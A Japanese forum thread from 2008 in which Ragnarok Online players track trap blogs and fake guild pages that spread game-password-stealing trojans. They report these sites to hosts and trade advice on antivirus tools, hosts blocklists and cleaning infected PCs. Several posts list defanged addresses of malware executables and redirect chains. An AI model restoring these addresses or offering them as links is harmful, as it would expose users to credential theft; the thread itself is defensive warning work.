Yahooのは分からんが、メッセンジャーの脆弱性か？

何にせよ、危険。 <> （○口○*）さん<>sage<>08/07/09 11:08 ID:5cPr6K1D0<> >>279
>>283

むむ、またお得意のパターンだったか。(kanauni　と kanapuri)
最近この手が無かったので引っかかっちゃったぜ、チェッ！
ほんとに忘れたことに使いやがるからたちが悪い。

どっちにしろ罠ブログなのでこれは通報しておくね！
しかしここもライブドア、ヤプログに続いて拠点化する恐れありだな、油断大敵。 <> （○口○*）さん<>sage<>08/07/09 11:15 ID:3fTT1tOw0<> >>275の追記

KB951748入れたら繋がらなくるが、ZoneAlarmのファイヤーウォールの設定から
インターネットゾーンセキュリティの初期設定の高を中に下げたら繋がった
逆に高に戻すと繋がらない、ステルスモードは使用不可な為自己責任で <> （○口○*）さん<>sage<>08/07/09 11:43 ID:5cPr6K1D0<> と言う訳で件の罠ブログは詳細を含めて忍者運営へ今通報が完了した、お騒がせゴメンよ。 <> （○口○*）さん<>sage<>08/07/09 12:08 ID:9wCrbn7l0<> >>284
錯誤を狙うのは(infosueekもそうだけど)前からなんだから
調査するURIはコピペでいかないと。 <> （○口○*）さん<>sage<>08/07/09 12:24 ID:9wCrbn7l0<> >>283
www■infosueek■com/xin/xia.exe
6月12日製造。約1ヶ月経ってるのでほとんど捕獲できるんじゃないかな。 <> （○口○*）さん<>sage<>08/07/09 12:29 ID:wHFxOIvg0<> 悪質化が進んでるな
そういえば探し物をしてるときのことをちら裏程度のメモだけど公開

http://www■hozen■org/bbs/34/13100/
にアクセスしたとたんカスペさんが叫んだ訳ですよ。

ちなみに中身
─→http://www■gamehanbook■com/esports/
──→http://www■gamemmobbs■com/esports/Ms06014.htm

カスペさんの履歴にある（多分これがらみのアドレス）
http://www■megaretic■org　
が何故か登録者情報も何も存在しない　whois掛けても情報なし

ちなみにウイルスは7/6にViruslist JPに登録されている
ウイルス名称　Exploit.HTML.Mht <> （○口○*）さん<>sage<>08/07/09 12:35 ID:wHFxOIvg0<> 因みにソースチェッカーを見ても現在
http://www■hozen■org/bbs/34/13100/
にウイルスが仕込まれてるとかの問題はないことを付け加えておきます <> （○口○*）さん<>sage<>08/07/09 12:41 ID:wHFxOIvg0<> しかし未だにカスペさんが叫ぶな・・・
未知の何かが仕込まれてるのか？ <> （○口○*）さん<>sage<>08/07/09 12:52 ID:5cPr6K1D0<> 先のタイポ罠ブログは忍者運営から今メールが来て対処したとのこと。
メール送付から約1時間ほどで対処してくれた。

ウィキ巡回をしているとLivedoorwikiのROカードバトルWikiが改竄されたままになっていたので修正と、罠269gブログ通報.
言うまでもなく他人のFC2ブログ記事丸パクリ＋teamerblogが仕込まれていた。 <> （○口○*）さん<>sage<>08/07/09 13:27 ID:9wCrbn7l0<> >>289
前半はいつものパス抜き。
www■gamemmobbs■com/esports/ro2.exe
6月15日製造。約1ヶ月(ry
後半はwhoisにはある。ステータスがholdになってるけど。 <> （○口○*）さん<>sage<>08/07/09 13:43 ID:9wCrbn7l0<> スカッとパンヤ
【重要】公式サイト改ざんに伴う皆様へのお願い
ttp://www.pangya.jp/board_notice_view.aspx?seq=1576
↓
4Gamer
「スカッとゴルフパンヤ」公式サイト改竄事件続報
ttp://www.4gamer.net/games/014/G001477/20080708039/
今回の事件では，土曜（7月5日）夜の時点で連絡が入ったとされており，
実際にメンテナンスが行われたのは月曜（7月7日）になってからである。
こういったものは土日のサポートが薄い時間を狙って仕掛けられることが多いのだが，
アカウント情報やゲーム内通貨などを扱っているサイトであれば，
事実確認を最優先することは当然のことである。
ウイルス検出ソフトで反応したURLが通知されていたのなら，
ページソースをざっと眺める，ないし，ウイルス検出ソフトをインストールしたPCで
同ページを開くだけでも確認できたはずだ。
1日半の「事実上の放置」（調査中だったとされているが）は大きな問題といえるだろう。
現在では，オンラインゲームの大手となったゲームポットにしては，
杜撰な対応ではないだろうか。 <> （○口○*）さん<>sage<>08/07/09 13:44 ID:9wCrbn7l0<> なんだよ「スカッとパンヤ」って…「スカッとゴルフパンヤ」だった。 <> （○口○*）さん<>sage<>08/07/09 13:58 ID:VP51IgiY0<> パンヤがスカッたのですね。わかります。

>オンラインゲームの大手となったゲームポット
親会社のソネットも同上ってことで。 <> （○口○*）さん<>sage<>08/07/09 14:20 ID:VP51IgiY0<> ふと思い出したんだけれど、みんなWindows Defender は入れてる？
システムの変更を監視してくれるので、有効に使うには多少の知識が
必要とはいえ役に立つと思うんだけれどね。
何かあったとき教えてくれるし、操作を許可するか拒否するか選べる。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/07/09 19:07 ID:/VaBuc4i0<> Proの一時作成ファイルにも反応することがあったり、
何かソフトをインストールした時や
手動でhosts変更を加えた時にきっちり反応してくれます。
わからない動作のものに関しては一度拒否した後で
それが何か調べてから対処したり出来ますので心持安心感が。

フルスキャンとクイックスキャンがありますけど、
自分の環境だとバスターと比べてクイックは5分もかからず、
フルだとカスペとバスターとも同じ位の時間ぐらいですが
ファイル数だけ比較してもこれもほぼ同数。

WindowsDefenderは別窓作業しながらでも体感早かったのは
圧縮ファイルの検索深度が低いからなのかどうなのか判りませんが
他のと比べると軽い印象があります。　

と簡単な使い勝手ですが報告までー。 <> （○口○*）さん<>sage<>08/07/09 19:44 ID:r+c5cT2U0<> 今日当たったパッチ、実はとんでもない脆弱性の対策を
含んでいたって話。
http://www.afpbb.com/article/environment-science-it/it/2415865/3112275

DNSに絡むものらしいけれど、全ての人に影響があるとか。
技術的な詳細は１ヶ月間明かされず、パッチもリバースエンジニアリングが
できないよう施しがしてあるらしい。 <> （○口○*）さん<>sage<>08/07/09 20:14 ID:z6X69Vml0<> Windowsの脆弱性ではなく"インターネットの脆弱性"なのかー <> （○口○*）さん<>sage<>08/07/09 20:44 ID:9wCrbn7l0<> DNSはWindowsに限った話じゃなく、最大手のISC BINDとかもだしねぇ。
サーバ管理者がゲンナリしていると思われ。 <> （○口○*）さん<>sage<>08/07/09 21:05 ID:r+c5cT2U0<> BIND9のパッチ公開、DNSキャッシュポイズニング攻撃に対処
http://www.itmedia.co.jp/enterprise/articles/0807/09/news026.html

前からDNSは脆弱性が指摘されていたけれど、それが現実になって
しまったってことで、機会を見てDNSSECが全体的に導入されるといいがな。 <> （○口○*）さん<>sage<>08/07/09 22:49 ID:xWnCq8mp0<> インターネット自体が、そもそも性善説によって成り立つシステムとして設計されているからな <> （○口○*）さん<>sage<>08/07/10 01:09 ID:idEspQlY0<> 規模こそ拡大したけど、まだ随所にUUCP時代の名残が残っている訳で。当時はnetnewsトラフィックが主流だったけど。
sendmailはqmailやpostfixに置き換えられる事例が増えたけど、POP3は依然としてAPOPやIMAPへの移行が進まないし。
もっともこっちは、WebMailが主流になることでPOP3が使われなくなる方が早そうだが。
SenderID/SPF&DomainKeysはようやく浸透しつつあるものの。 <> （○口○*）さん<>sage<>08/07/10 01:54 ID:iens2h4n0<> httpが平文で流れているのはともかく、他のプロトコルは公開鍵方式で
暗号化だけでなく成りすましも防止しないと危ないよなあ。
DNSで曲げられちゃうと。 <> （○口○*）さん<><>08/07/10 03:48 ID:5JMvRq5k0<> 【　　　気付いた日時　　　　　】 7/9 朝
【不審なアドレスのクリックの有無　】Yes>http//ime.nu/www■makgcat■com/woodem.htm
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【　　ツールの使用の有無　　　】 No
【　ネットカフェの利用の有無　　　】 Yes
【　　　 OS　　】 2000 SP4
【使用ブラウザ】 IE7
【WindowsUpdateの有無】かなり前に自動更新
【　アンチウイルスソフト】マカフィー・インターネットセキュリティスイート
【ウイルススキャン結果】
マカフィーにてスキャン　異常なし
カスペルスキートライアル版にてスキャン　異常なし
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
GM募集を装った垢ハクURL。踏むとカラの白いページのサイトに飛ばされ、
マカフィーがトロイの木馬であることを報告。同時に怪しいファイルを
速攻排除した旨もアナウンス。
当方２PC環境ではあるのだが、同じ回線よりルーター分岐させ、かつピア２ピア
で繋いだ状態。感染していないPCからパスを変えても問題ないでしょうか？
感染PCのほうで公式サイトを閲覧するとまずいのでしょうか？
ROにはいっさいログインしておりませんが、万全を期すならば
OS再インストールでしょうか。 <> （○口○*）さん<>sage<>08/07/10 07:56 ID:5lFe6ffA0<> >306
踏んでない方のPC　→　PASS変更は問題無し
踏んだ方のPC　→　（万全を期するなら）HDDフォーマットの上OS再インストール <> （○口○*）さん<>sage<>08/07/10 08:48 ID:AEbBXqnC0<> 感染PCでの公式サイト閲覧自体は問題無いが、IDとパスを利用するページ（クッキー保存のものも含む）は危険。
本来、なにか踏んだら、即刻LANケーブル引っこ抜けという位の扱いが望ましい。

安全な環境にするのが最優先。それ以外の作業（Webページ閲覧など）は、後回しにしなさい。 <> （○口○*）さん<>sage<>08/07/10 11:23 ID:FtN8jYMv0<> 福建中華の罠ブログ、7月9日作成。
記事はどっかのROブログから丸パクリ。
blog■livedoor■jp/cvooe/

game689と閉店セール状態のmakgcatの実行ファイルリンクが貼られている。

cvooeと言う名前でyh33ddd同様、XREAを初め、あちこちのコミュニティに潜入している。
Googleでcvooeを検索すると5000件超ヒット。

リンクが実行ファイルなあたり、今回の罠ブログはよほど慌てて作ったかな。

しかしライブドアは通報してもなぁ、機械返答＆規約に罰則が無いので対処しませんで終わりそうだな。
忍者の1時間で対処とは偉い違いだ。
ライブドアブログはahirun1,yh33ddd,cvooeと着実に拠点化が進むのだった。

ともあれ気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/10 11:29 ID:lBkIvswJ0<> >>306
>【　　　 OS　　】 2000 SP4
>【使用ブラウザ】 IE7
XPなのかIE6なのかきっちりしてくれ。

主要なアカハックマルウェアは、LANの中で自己増殖するものは希少、というかほぼ皆無。
よって、まずは感染PCを清浄化することが最重要。感染後にID/passの入力を伴わなければ、原則盗むようがない。
windows2000なのであれば、OS再インストールついでにIE系以外のブラウザ導入も検討すると良いかも。IE7の提供はされないので。
別PCの方は、念の為にカスペ(オンライン版で可)でフルスキャンを掛けておくのが良いかと思われ。 <> 306<><>08/07/10 13:31 ID:5JMvRq5k0<> すみません以下の情報誤りでした。
>【　　　 OS　　】 2000 SP4
>【使用ブラウザ】 IE7

正しくは、
【　　　 OS　　】 win2000 SP4
【使用ブラウザ】 IE6
でした。

>307
>308
>310
アドバイス感謝いたします。
ひとまずはOS再インストいたします。 <> （○口○*）さん<>sage<>08/07/10 16:26 ID:CwJuRyzH0<> 質問を２つ。

１．レジストリを自身のPC以外から編集する方法ってありますか？

先日、知り合いにPC（バスター2008使用）のウィルス駆除の依頼を受けたが
全然PCが起動せず、別PCにHDDをぶら下げて、そこからカスペの体験版で
駆除を実施。

しかしレジストリが改竄されてるのか、ウィルスを駆除してもHDDを戻しても
起動しない。
仕方なく、全データを別のPCにコピーして、OS再インストール。

作業しつつ、他PCからぶら下げたHDD内のレジストリが操作できれば
もう少し楽に復旧出来たのかも、とか思った次第。

２．Linix系のアンチウィルスソフトって無償で検出力の高いものってありますか？

上記作業のときに、LinuxのLiveCDで起動してHDDチェックする方法を
思いついたものの、アンチウィルスソフトに何を使えば分からず使用諦め。

そのあたりが低容量で収めれるなら、名刺サイズのCDRに焼いて持ち歩いてたら
何かと便利かも？とか思った次第。

上記二点、何かご存じの方いませんか？ <> （○口○*）さん<>sage<>08/07/10 16:45 ID:zucQ7csD0<> 根本から覆すような回答ですが

>>312
1.
>ウィルスを駆除してもHDDを戻しても起動しない。
それは「復旧を諦めるポイント」だと思います。
せいぜい、OSの修復インストールを試みるくらいでしょうか。

2.
パターンが日々更新されるのにCD-Rに焼くのはナンセンス。
OSが生きている前提で、とりあえずこういうのを使ってみるとか。

ウイルス検出・駆除用無料ツール Dr.Web CureIt!
http://drweb.jp/support/cureit

BitDefender8を使う。
アップデートファイルが↓にあるのでこれで更新して使う。
http://www.bitdefender.com/site/view/Desktop-Products-Updates.html

ノーパソと、HDDをUSB接続できるケーブルを持って出かけるのが
楽そうですけれどねー。 <> （○口○*）さん<>sage<>08/07/10 16:46 ID:zucQ7csD0<> 追記。回答のために参考にしたQ&Aです。

オフラインでウイルス診断ができるか？
http://okwave.jp/qa2967587.html <> （○口○*）さん<>sage<>08/07/10 16:49 ID:LUA3+AWU0<> regedit
ファイル→ネットワークレジストリへの接続
ネットワークドライブ等と同様に権限の確認が行われるので
起動しなきゃだめだけどね。
DBの構造としてはJetらしいので直接いじることもできるかもしれんけど
たぶんクリーンインストールしたほうが早い。

Linuxは2CHのLinux板とかで聞いたほうがいいんじゃね?
ここはあくまでROの板。Windows以外はさすがに管轄外。 <> （○口○*）さん<>sage<>08/07/10 17:06 ID:QH1ZEd2BO<> レジストリを直しても他が壊れてたら起動しないから
サルベージしてクリーンインストールおすすめ <> （○口○*）さん<>sage<>08/07/10 17:47 ID:FtN8jYMv0<> >>312
>２．Linix系のアンチウィルスソフトって無償で検出力の高いものってありますか？
俺はWindows2000/openSUSEのデュアルブート環境でPCを使っているのでなるたけ同じアプリ、と言う意味で
両者にAntivir入れてる。
SUSEではOSインストール時にパッケージの選択でチェックを入れればインストール出来る。
もちろんOSインストール後も可能だけどね。 <> （○口○*）さん<>sage<>08/07/10 18:17 ID:LUA3+AWU0<> 今日拾った新型。
ttp://www.virustotal.com/analisis/88dd48ae6dbc27ed561a87ee04ca1ad6
ttp://blog-imgs-21.fc2.com/i/l/i/ilion/2008070704.png
FC2 livedoor Yahoo! WindowsLive yaplog! YouTube mixi ニコニコ動画
万が一これらのIDやパスワードがROと同じならそのまま使えてラッキー、
そうじゃなくても(たぶんこっちが本命だけど)なりすまして罠ばら撒き。
スルー組(avast AVG McAfee Microsoft NOD32 Norton バスター)には提出済み。 <> 312<>sage<>08/07/10 19:48 ID:CwJuRyzH0<> レジストリを外部からは無理ですか
少なくとも RUN の部分だけでも修正出来れば多少マシになるかな、とか
思ったんですが。

Linixの方は、単純にLiveCDやUSBメモリ起動のLinux環境を持ち歩けたら
ハク時でも安全な環境からのPass変更が出来るし、それに加えてウィルスの
駆除も出来たら便利かな、と思った次第。
DHCPで大抵ネットに繋げれるから、最新のパターンファイルはDL出来るし
緊急時の環境という意味では悪くないかな、と。 <> （○口○*）さん<>sage<>08/07/11 01:05 ID:dUdXv98L0<> >>312
HKLM選択状態で、[ハイブの読み込み]で該当HDDのsystem.regをインポート。
必要な部分の編集が終わったら、[ハイブのアンロード]で反映。
これで出来ないかな。

Linuxでのアンチウイルスソフトは、ClamAVの名前が良く出てくるような気がします。 <> （○口○*）さん<>sage<>08/07/11 04:30 ID:2BxL5X790<> 広告でのハッキングは今のところXREAだけという認識でｏｋ？
atWiki閲覧中にPCが何か裏で動いてたっぽかったもんで気になった

とここまで書いて気づく、どうやらMcAfee様が更新を確かめに行っただけだったみたいだ <> （○口○*）さん<>sage<>08/07/11 09:10 ID:Gsap/d3a0<> ok？て言われてもだれもそれを保証できないわ。
世間的な認知、という程度ならそれでいいけれどね。 <> （○口○*）さん<>sage<>08/07/11 09:56 ID:j4Djs5RM0<> >319
USBメモリ起動のLinuxはLiveCDと違ってポケットに入るし便利。

以前はLiveCDなり使って、一度Linuxを起動してからUSBメモリに
インストールする必要があったが、liveusb-creator というソフトなら
Win上から直接USBメモリにLinux(Fedora)をインストール出来る。
ttps://fedorahosted.org/liveusb-creator

また最初からインストール済みのUSBメモリも販売されてるのもある。
ttp://pc.watch.impress.co.jp/docs/2008/0612/cramworks.htm

最近はUSBメモリも安いし、緊急用のLiveCDの代わりにUSBメモリは
結構良いと思う。
Biosが対応してる必要はあるけどね。

>321
>248 もそうなんじゃないのか？
ffxiahってのが、どこにあるどんなサイトなのか知らんけど。 <> （○口○*）さん<>sage<>08/07/11 10:32 ID:1mNG+TZm0<> FFXIには競売所というシステムがあって(露店放置する必要がない)、
それの取引状況を表示する非公式サイト。 <> （○口○*）さん<>sage<>08/07/11 10:44 ID:2BxL5X790<> >>322
今現在、他に例があがっているのかを知りたかったんだ。
ともあれサンコス。 <> （○口○*）さん<>sage<>08/07/11 14:55 ID:Q0NR2iX+0<> ちょっと質問です。
先ほど久しぶりにメールチェックをしたら、AGVのメールスキャンでトロイを5つほど検知したのですが・・・
即削除、メールも開けずに削除して、その後に全PCスキャンもして発見されませんでした。
メールソフトはOutlookです。
ウィルス対策ソフトはAVG Anti-Virus Free Edition8.0です。

ひとまず安心していいものでしょうか？ <> （○口○*）さん<>sage<>08/07/11 15:03 ID:Gsap/d3a0<> >>326
メールスキャンで検出・削除ならそのままで問題ないかと。
心配なら、カスペのオンラインスキャンでもかけておいたら？ <> 326<>sage<>08/07/11 16:29 ID:Q0NR2iX+0<> 心配だったのでカスペルスキーのオンラインスキャンしてきました。
特に何も見つからず一安心です。

AVG導入して以来、メールスキャンで初めて検知されて焦った次第です。

とにかく、ありがとうございました。 <> （○口○*）さん<>sage<>08/07/11 17:23 ID:CxaANRLW0<> AVGって18禁体験版DL直後は反応しなかったのに
しばらくしてからウイルス入っているとかいうから
信用していいものか悩んでいるお <> （○口○*）さん<>sage<>08/07/11 19:50 ID:9B3yfYoL0<> >>329
それパターン更新で対応して、定期スキャンかけなかったから
ファイルに触るまで放置されていただけでしょ <> （○口○*）さん<>sage<>08/07/11 21:38 ID:IprCZOaT0<> >>329のPCは、目出度くエロ禁PCとなりました。 <> （○口○*）さん<>sage<>08/07/13 01:57 ID:ZmsZ2/L20<> エキサイトブログに作られた罠ブログ、
ffxijod■exblog■jp

いつもの手口、他人のブログ記事をパクったもの。
kovieという名でこれまたあちこち潜入している模様である。

罠ブログにはIMGタグトラップもあるので注意。
それ以外にも新手の罠があるようだ、”それはリンクを閉じない”。
最新記事の中の"FF11動画"と言う部分にjplineageの実行ファイルへのリンクがあるが。
ソースを見ると実行ファイルのリンクには</a>がない。
つまり、その記事中のリンクより下がすべてウィルス実行ファイルへのリンクになってしまうのだ！
記事内限定であるから危険な記事をスクロールアウトするなりすれば回避できる。
Comment欄から
コメントを入れてみたが、コメント文もウィルス実行ファイルへのリンクに！

何せコメントのフォームの中でマウスクリックしてもこれをDLしようとするからうっかりクリックも出来ない。
知らない奴が訪問ありがとうとコメント入れようものなら即時にダウンロードダイアログがでるだろう。
実行ファイルじゃなくていつものステルスIFRAMEとかだったらと思うとゾッとするわ。

とりあえずはエキサイトに通報済み。
気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/13 02:29 ID:GTF/mkfJ0<> ブロック要素をまたげないのか次のaタグで止まるのか、
全部リンクにはならないね(「強さは計り知れない」の手前で止まっちゃってる)。 <> （○口○*）さん<>sage<>08/07/13 03:57 ID:1D2IVu8y0<> 本来の仕様だとAタグはブロック要素を含められないからね
たぶんブラウザに依存するんだろうな <> （○口○*）さん<>sage<>08/07/13 05:32 ID:upc6Qxss0<> Gecko系だときっちり解釈するので、コメントフォームの記述部分までA要素が波及しているね。
IEだと、手前のトラックバックリンクのA閉じで、閉じ忘れの要素まで断ち切られている。駄目実装に結果的に救われた感じが。

もっとも、exblog自体が広告にiframe使いまくりのin-Valid設計で気持ち悪いけど。 <> （○口○*）さん<>sage<>08/07/13 05:51 ID:5lh+W9lW0<> >>335
invalidとin valid（って普通は書かないけど）は意味逆だよ。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/07/13 07:59 ID:28DGsUIv0<> 申し訳ないことに恥ずかしながら
先日追加したリスト部分で追加した更新日付部分"08/07/13/0121版"に
コメント行"#"を追加し忘れていました。
現在は修正しております。

ここで初心者的な質問なのですが、
アコプリWikiさんのhostsRenewScriptを使用時に
リスト側でこういったミスを起こしていた場合は
どのように動作処理するのでしょうか？
正しいリスト表記では無いので、
そこで処理終了となっていればいいのですが…。

もしスクリプト利用の方がいらっしゃったら教えていただければ幸いです。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/07/13 08:02 ID:28DGsUIv0<> ・補足説明
#コメント行
127.0.0.1 ドメイン名
が
コメント行
127.0.0.1 ドメイン名
こんな感じのミスをしてました。 <> （○口○*）さん<>sage<>08/07/13 08:13 ID:sY4q1I3K0<> 127.0.0.1 ドメイン名のスペース以後のみをドメイン名とみなすので
コメントにスペースやタブが含まれない場合は無視されます。

"08/07/13/0121版" → その行は無視。
"08/07/13 0121版" → "127.0.0.1 0121版" として記録される。

残念ながら終了にはなりませんね。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/07/13 08:35 ID:28DGsUIv0<> >>339

#コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
#コメント行
127.0.0.1 ドメイン名
だと

#コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
127.0.0.1 コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
#コメント行
127.0.0.1 ドメイン名
127.0.0.1 ドメイン名
という感じで処理されているということですか。

スクリプトのほうの初期設定では
リストは常に新規作成と言う事みたいなので
その場合はコメント行のミスは無かったことになるのですけど、
追記モードONの人で追記時の条件127.0.0.1を追加しない人は
誤動作起こしているかもとか…？

いやはやとにかく失礼しました。
出来る限りミスは避けたいところなのですが
スクリプト使用の方々はこちらのミスで
変なことになってないか手持ちのhostsリストを確認していただけたら幸いです。 <> （○口○*）さん<>sage<>08/07/13 09:58 ID:cXLIGBaI0<> >340
PC2台、タスクで日に4回処理させてるが、変なのは無かった。
確認したのは作成時間が
1台目：今日の00:30・06:30
2台目：今日の02:00・08:00
の計4つ(バックアップ含む)で、127.0.0.1を付加する設定。

127.0.0.1を付加する設定(初期設定)ならスペースが入ってても書式的に
問題ないから、誤動作はしないはず。
127.0.0.1を付加しない設定に変更してる人は、変な行が出来てて
誤動作する可能性もある。

でも、わざわざここの設定を変える意味がない(※)し、今回のケースは
結果的に問題は無かったと思われる。

※127.0.0.1を付加しない設定＝元リストの内容をそのまま書く、という意味。
　でもそれだと元リストが改竄される等で罠IPが入ったリストを読み込んだ
　場合が危険。
　だから当初からscript側で付加するのが初期値になってる。

何はともあれ、深夜と朝と２回の更新、お疲れ様です。 <> （○口○*）さん<>sage<>08/07/13 12:41 ID:/fqB52ZU0<> 先程見つけた中華サイトへの招待状
ギルド＆キャラ名は伏字

>1 名前：774回デスペナな魔術師さん[] 投稿日：2008/07/13(日) 11:40:22
>Sara鯖で活動している『●●●●』というｷﾞﾙﾄﾞです。
>HPを作成しましたので、来訪者歓迎です＾＾
>GMも募集してますので、よろしくですヽ(ﾟ∀ﾟ)ﾉ
>お気に召しましたら『▲▲▲▲』か『▼▼▼▼』までWisお願いします♪
>※もしくはBBSへの書込みでもOKです♪
>【以下URL】
>http://www■game689■com/jpro■htm/
>
>※※【BBSへの書込みについて】※※
>中傷的な内容や、悪質なリンクは固くお断りしておりますので
>ご理解とご協力お願い申し上げます。 <> （○口○*）さん<>sage<>08/07/13 13:05 ID:GTF/mkfJ0<> >>342
2年前のドメインで今月26日にexpireになるので最後っ屁。
…のつもりがURIの最後に「/」付いてるので
ディレクトリ扱いで404 not foundで残念なことに。
どうも爆撃部隊の教育がなっとらんな。

www■game689■com/dd.exe
2008-06-30 18:10
Dr.WEB Trojan.PWS.Gamania.9824 感染後は Trojan.PWS.Gamania.origin
KasperskyTrojan-PSW.Win32.Mapler.ae 感染後は Trojan-PSW.Win32.Mapler.ao <> （○口○*）さん<>sage<>08/07/13 13:15 ID:dire3vpq0<> >>342
jpro.htmからdd.exeを呼び出し。カスペは全機撃墜。

ttp://www■game689■com/jpro■htm
ttp://www■game689■com/dd■exe

同じドメインの中にこんなファイルもある模様

ttp://www■game689■com/rmvb■exe
ttp://www■game689■com/vbshokmm/ff11■exe
ttp://www■game689■com/vbshokmm/t1■exe
ttp://www■game689■com/vbshokmm/ie■exe
ttp://www■game689■com/vbshokmm/ro■exe

jpro.htm : Trojan-Downloader.Win32.Agent.bzy
dd.exe : Trojan-PSW.Win32.Mapler.ae

rmvb.exe : Trojan-PSW.Win32.Mapler.ae
ff11.exe : Trojan-PSW.Win32.Mapler.ae
t1.exe : Trojan-PSW.Win32.OnLineGames.lbb
ie.exe : not-a-virus:AdWare.Win32.BHO.cd
ro.exe : Trojan.Win32.Inject.qt <> （○口○*）さん<><>08/07/14 15:38 ID:IRhV5Sud0<> RAGUくえり情報抜取：皆様の個人的アカウントID情報を取得しました
RAGUくえり情報抜取：ご協力感謝します
RAGUくえり情報抜取：またのご協力お願いします
RAGUくえり情報抜取：ご質問・苦情などは　RAGU■web■netにお願いします

露店をしていたら、これが流れたのですが、ハックとかなのでしょうか？
大勢の方が、露店をしているので、不安になり書き込みさせていただきました。 <> （○口○*）さん<>sage<>08/07/14 15:48 ID:qQBBXNev0<> >>345
それこっちでも流れた
怪しいから踏んでないけど・・ <> （○口○*）さん<>sage<>08/07/14 15:56 ID:iUdqC3r90<> 狼鯖首都でも流れてたな。
新手の垢ハックかもしれんのでID抜き不正ツール使用で通報しといた。 <> （○口○*）さん<>sage<>08/07/14 15:58 ID:CfhSYNpJ0<> RAGUくえりはこれ。危険URLではないが■つけとく。
http://robot■maturi■org/test/

運営状況を監視するために規約違反しているようだが、
その是非はスレ違いなので書かないでくれ。

その発言自体は、対抗勢力がやってそうな雰囲気だが。 <> （○口○*）さん<>sage<>08/07/14 15:59 ID:ipdCLrhR0<> どう見てもキャラクエ <> （○口○*）さん<>sage<>08/07/14 16:00 ID:+obmqKDJ0<> 名前から察するにきゃらくえ情報を収集してるんだろう
律儀に「収集しました」って報告する奴は初めて聞いたけどｗ <> （○口○*）さん<>sage<>08/07/14 16:02 ID:f/3Mtrh50<> 現時点では RAGU■web■net というホストは存在していない様だ
但し、RAGUweb■net というホストは存在する <> （○口○*）さん<>sage<>08/07/14 16:26 ID:qQBBXNev0<> http://RAGU■web■net
こっちはなんだろね <> （○口○*）さん<>sage<>08/07/14 16:57 ID:YYqEf7fA0<> 16:50ころにBijou鯖でも流れた <> （○口○*）さん<>sage<>08/07/14 17:07 ID:oGwoc1mIO<> 今度はこっちに湧いたか…

ＢＯＴ状況観察スレから追い出されたあらしだと思われるので
ＲＡＧｗｅｂ関連はスルーの方向で <> （○口○*）さん<>sage<>08/07/14 17:14 ID:NrjfyAmU0<> 「IDを抽出しました」に反応せざるを得ない部分ではあるからな
ただ、ログインIDのことではないと思われるので、ここで扱うのは無意味
よって>>354 <> （○口○*）さん<>sage<>08/07/14 17:15 ID:O0jUBkDX0<> 一応URLは踏まないようにと警告しておいたらいいんじゃない？無害でも怪しい物として <> （○口○*）さん<>sage<>08/07/14 18:19 ID:BtFC6YzH0<> >>356
怪しくもなんともないし、危険でもなんでも無い。警告する必要はかけらもない。

ゲーム内の棄て垢キャラの発言が気になって来た人に対しては、安全なので心配しないようにというのが結論。 <> （○口○*）さん<>age<>08/07/14 18:36 ID:pX7LRAhj0<> ホムでID調べました
で逃げられるんとちゃう？ <> （○口○*）さん<>sage<>08/07/14 18:37 ID:ifvuynd00<> >>357
×安全なので
○危険というわけではないので <> （○口○*）さん<>sage<>08/07/14 18:37 ID:NrjfyAmU0<> PCにとってじゃなく精神的に「怪しい」ともいえるな
とにかく見に来させて、サイトの存在を認識してもらうと
BOT対策スレなどでもそうだったが、、とにかくサイトの存在自体をアピールしたいという意志が窺える
ゴシップものは何であれ気になるものだしね

ということで売名行為乙でスルーが一番 <> （○口○*）さん<>sage<>08/07/14 20:00 ID:iUdqC3r90<> ほんとにホムでID抜いてるのか？
この発言してた奴はノビで、画面内に他ケミ＆ホムなんていなかったと思うが？ <> （○口○*）さん<>sage<>08/07/14 20:11 ID:OtC6jtGx0<> >361
ホムでやってようがツール使ってようが、どっちにしろスレ違い
気になるなら本人に聞けばいい <> （○口○*）さん<>sage<>08/07/14 21:28 ID:BBs4RD8r0<> RAGUの売名とみせかけて、アンチRAGUの嫌がらせだったようだ
（アンチRAGU＝キャラ情報収集されると困るミジンコboter）

すれ違い乙 <> （○口○*）さん<>sage<>08/07/14 22:00 ID:zREUIKC50<> 中華の罠ライブドアWikiと罠ヤフーブログ。
どっちもIDはyty3le、tinyurlでも使ってたよな。
wiki■livedoor■jp/yty3le (ライブドアの罠Wiki、下のブログへのリンクあり)

blogs■yahoo■co■jp/yty3le (コメントでの感染狙い、初期コメントに罠FC2へのリンク(消滅済み))

後者はWikipediaの日本の女優の記事？パクリで相手を信用させ、コメントリンクで感染を狙ったもの。
先のyh33dddのように福建中華はIDを共通化させる傾向が強い。
ヤフーブログにはhutou(ピンインで口座)シリーズだけでもこれだけあった。(何れも削除済み)
hutouyy88 hutou2541 hutou224510 hutou332211 hutou55321 hutou558963

ブログや掲示板持ちは禁止語句に”hutou”なり”/hutou”とでもしておけばよいかも。
ともあれ気をつけてくれよな！ <> （○口○*）さん<>sage<>08/07/15 04:10 ID:V2QJo8aw0<> Lydia板に書き込まれていたものです

www■voiceblog■jp/rakushushus
　→www■teamerblog■com/blog/
　　→www■panslog■net/wiki/index1.htm
　　　→www■teamerblog■com/wiki/cer.exe　　←ウィルス
　　→www■panslog■net/wiki/0733.htm
　　→www■panslog■net/wiki/flash.htm
　　→www■panslog■net/wiki/real11.htm

www■voiceblog■jpもインラインフレームが使用可能な為
サイズ0ので作成し、外部ページを呼び出しているようです <> （○口○*）さん<>sage<>08/07/15 06:12 ID:yyj4on2A0<> そういえば、GungHo-IDに@がついている人は一度限りだけれど
IDの変更ができるよ（来年3月まで）。 <> （○口○*）さん<>sage<>08/07/15 07:15 ID:UdP0vmSn0<> >>365
初めて聞くブログだなぁ。通報済み? <> （○口○*）さん<>sage<>08/07/15 08:35 ID:pdjVWTkx0<> >>367
>>63-64で既出。つか、まだ凍結されていなかったのか。
